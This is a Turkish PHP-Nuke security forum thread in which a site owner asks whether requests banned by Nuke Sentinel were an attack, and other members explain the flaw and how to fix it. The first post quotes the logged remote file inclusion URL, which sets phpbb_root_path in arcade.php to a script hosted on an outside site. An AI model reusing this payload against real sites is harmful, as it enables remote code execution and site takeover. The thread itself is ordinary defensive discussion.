Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 1306
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Nuke sentinelin sorgulama..
(4993 okuma, 0 yanıt)
 dizin CHMOD ları değişmiy..
(8258 okuma, 6 yanıt)
 3.3Patch Hakkında Versiyo..
(3479 okuma, 0 yanıt)
 nuke sentinel 2.6.01 kura..
(10206 okuma, 10 yanıt)
 Nuke Sentinel..
(4583 okuma, 2 yanıt)
 Nuke 8.0 Guvenlik..
(5121 okuma, 2 yanıt)
 Php Nuke 8.0 Güvenlik asa..
(3585 okuma, 0 yanıt)
 php nuke 8 kurdum güvenli..
(10568 okuma, 10 yanıt)
 Arkadaslar Lütfen Yardımc..
(9670 okuma, 9 yanıt)
 Site hacklendi sanırım.....
(5384 okuma, 2 yanıt)
 Hadi Protector Kuralım..
(42590 okuma, 45 yanıt)
 Bu bir saldırmı..
(8539 okuma, 7 yanıt)
 siteme virüs girmis..
(8616 okuma, 6 yanıt)
 Sitedekileri atmak..
(5472 okuma, 2 yanıt)
 Kötü botları engellemek...
(11640 okuma, 10 yanıt)
 2 dakika içinde 5 farklı ..
(7425 okuma, 5 yanıt)
 index atılamayan site yap..
(7358 okuma, 5 yanıt)
 Sanal Klavye Uygulamasi H..
(5553 okuma, 2 yanıt)
 js trojandownloader.agent..
(5953 okuma, 4 yanıt)
 Güvenlik konusunda yardım..
(7798 okuma, 8 yanıt)
 Sunucu firması websiteme ..
(5184 okuma, 2 yanıt)
 siteme saldirimi olmus?..
(6192 okuma, 4 yanıt)
 Protector bir işe yaramıy..
(14491 okuma, 15 yanıt)
 Nuke Sentinel 242 pl5 ( 7..
(27619 okuma, 25 yanıt)
 hacklendim mi?..
(6274 okuma, 4 yanıt)
 Güvenli prefix değiştirme..
(79643 okuma, 108 yanıt)
 7.6 ya 3.2 pack nasıl yap..
(4635 okuma, 1 yanıt)
 Site neden Google i banla..
(4352 okuma, 1 yanıt)
 PhpMyadminden toplu isim ..
(6485 okuma, 4 yanıt)
 sentinel güvenlik sistemi..
(7594 okuma, 6 yanıt)
 Sitemdeki Bu Acik Neyden ..
(7627 okuma, 6 yanıt)
 Saldırı yedim BW dolmuş. ..
(10301 okuma, 9 yanıt)
 sürümünüz < 7.8 ise s..
(7324 okuma, 5 yanıt)
 forum için kod yazma yasa..
(5170 okuma, 2 yanıt)
 Arkadaşlar hacklendim seb..
(4919 okuma, 2 yanıt)
 KENDİ TOLBARIMIMDAN AYDA ..
(5493 okuma, 3 yanıt)
 Bütün indexler değişmiş, ..
(4997 okuma, 3 yanıt)
 Çok sorulu, çok şıklı ank..
(3582 okuma, 0 yanıt)
 Protector' deki Host İs..
(3603 okuma, 0 yanıt)
 php nuke dosyaları şifrel..
(7875 okuma, 7 yanıt)
 index dosyasının chmod k..
(4225 okuma, 1 yanıt)
 AdminBox-1.0.3 Kurulumund..
(3779 okuma, 0 yanıt)
 gec saatlerde hızlanan tr..
(8207 okuma, 8 yanıt)
 Prefix değiştirmede coppe..
(4663 okuma, 1 yanıt)
 Nuke Güvenlik..
(165715 okuma, 257 yanıt)
 bütün index lere iframe e..
(19670 okuma, 24 yanıt)
 Nuke Sentinel Google bot ..
(5923 okuma, 4 yanıt)
 Siteme Sürekli Üye Oluyor..
(25571 okuma, 28 yanıt)
 Yeni iframe virüsler kodl..
(19865 okuma, 23 yanıt)
 Nuke Versiyonları Hakkın..
(3952 okuma, 0 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - 2 dakika içinde 5 farklı bölgedeki İP no banlandı,
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


2 dakika içinde 5 farklı bölgedeki İP no banlandı,

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
Sergen
Mesaj: 200+
Mesaj: 200+





Kayıt: Mar 31, 2008
Mesajlar: 298

MesajTarih: 2010-02-20, 12:41:17    Mesaj konusu: 2 dakika içinde 5 farklı bölgedeki İP no banlandı, Alıntıyla Cevap Gönder

Sitemdeki Nuke Sentinel 2 dk içinde 5 farklı İp noyu banladı. İp nolara baktığımda hepsi farklı yabancı ülkeye ait
124.193.89.** : ÇİN
88.191.43.** : FRANSA
94.23.115.** : KİNGDOM
203.84.249.** : KORE
219.117.205.** JAPONYA
Sorgulama yapımında ise şu link bulunuyor.
www.siteismi. com/ modules.php?name=forums/arcade.php? phpbb_root_path=http://www. sinhvienqb.com/news/idbun1. txt
(linklerin arasını ayırdım)
Bu bir çeşit saldırımı oluyor?
Bilen arakadaşlardan yorum bekliyorum.

Forumlar dolaşırken şöyle bir şey buldum
Alıntı:
dün sitemde arcade.php üzerinden admin şifremi ele gecirmişler expolit çalıştırırak eğer sizinde powernuke kurulu siteniz varsa şu değişiklikleri mutalaka yapın:
Arcade.php , functions.php , functions_arcade.php de aşagıdaki kodu bulun;
Kod:
include($phpbb_root_pathve bu kodun basındakı " $ " harfini silin..


Yukarıdaki yazılanlarla alaksı var sanırım
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-11-21, 14:51:41    Mesaj konusu: Forum Arası Reklamlar


Başa dön
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2010-02-20, 13:42:55    Mesaj konusu: Alıntıyla Cevap Gönder

Tehlikeli birşey yapmaya çalışmamışlar. Bi nevi test yapmışlar.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Sergen
Mesaj: 200+
Mesaj: 200+





Kayıt: Mar 31, 2008
Mesajlar: 298

MesajTarih: 2010-02-20, 14:37:06    Mesaj konusu: Alıntıyla Cevap Gönder

Forumlarda Arcade oyunlarını zaten kullanmıyoruz. FTP den arcade.php dosyalarını silsek iyi olmaz mı?
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2010-02-20, 18:18:44    Mesaj konusu: Alıntıyla Cevap Gönder

zararı olmaz silmenizin ama silmeye de gerek yok. arcade.php dosyasında <?php satırının bir altına $phpbb_root_path=''; eklemeniz bile yeterli
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bankocu
Editör
Editör





Kayıt: Jun 02, 2003
Mesajlar: 1842
Konum: Istanbul

MesajTarih: 2010-02-20, 19:16:26    Mesaj konusu: Alıntıyla Cevap Gönder

Aslında phpbb_root_path da aynı nuke prefixi gibi değiştirilmesi gereken sabit tanımlardan biri.
Nasıl ki bu tür standart saldırılar için nuke_ şeklindeki prefixi değiştirmek bir önlemse aynı şekilde phpbb_root_path da değiştirilmesi gereken bir şey.

Ama değiştirilmesi biraz daha zor olduğu için genelde kimse ilgilenmiyor.
Benim sitelerde phpbb_root_path yok örneğin. (Veritabanı içinde de, source dosyaları içinde de yok)
Yani yukarıdaki sorgu bu şekilde işlev göremeyecekti zaten.

Bir scriptin standart değerlerini ne kadar çok kullanırsanız, eline taş alan küçük çocukların o kadar kolay hedefi olursunuz.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2010-02-20, 23:06:55    Mesaj konusu: Alıntıyla Cevap Gönder

değişkenin değil, mantalitenin değiştirilmesi gerekiyor. register globals mantığı ile çalışmak güvenli birşey değil. $_GET['phpbb_root_path'] ile $phpbb_root_path aynı olmamalı. Tabi register global off olsa bu seferde mainfile import ediyor değişkenleri, dolayısıylada böyle riskli şeyler çıkıyor ortaya. O yüzden her değişkene bir ön tanım vermek şart oluyor. Bazı bloklarda bile benzer sorunlar var ama echo fonksiyonu kullanıldığından sayfa çıktısı ile anlık oynanabiliyo.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok VıdeolaR Orta Blogonunda Farklı Taray... cuneytsonmez Php Nuke Blocklar 3 2010-04-07, 23:02:49 Son Mesajı Görüntüle
Yeni mesaj yok tema genisliyor farklı tarayıcı ile ... cuneytsonmez Php Nuke Tema Paylaşımları 11 2010-03-28, 20:25:13 Son Mesajı Görüntüle
Yeni mesaj yok Wp- son dakika haberleri baska site y... kurtulus Wordpress Eklentileri 1 2010-03-25, 18:16:36 Son Mesajı Görüntüle
Yeni mesaj yok PHP-Nuke Haber V.1 'de en üstte kayan... hsengun1905 Php Nuke Sorunlarınız 11 2009-12-19, 02:42:33 Son Mesajı Görüntüle
Yeni mesaj yok Eklenti : Her block'a farklı görünüm ... efendymurat Php Nuke Blocklar 0 2009-10-29, 20:00:09 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright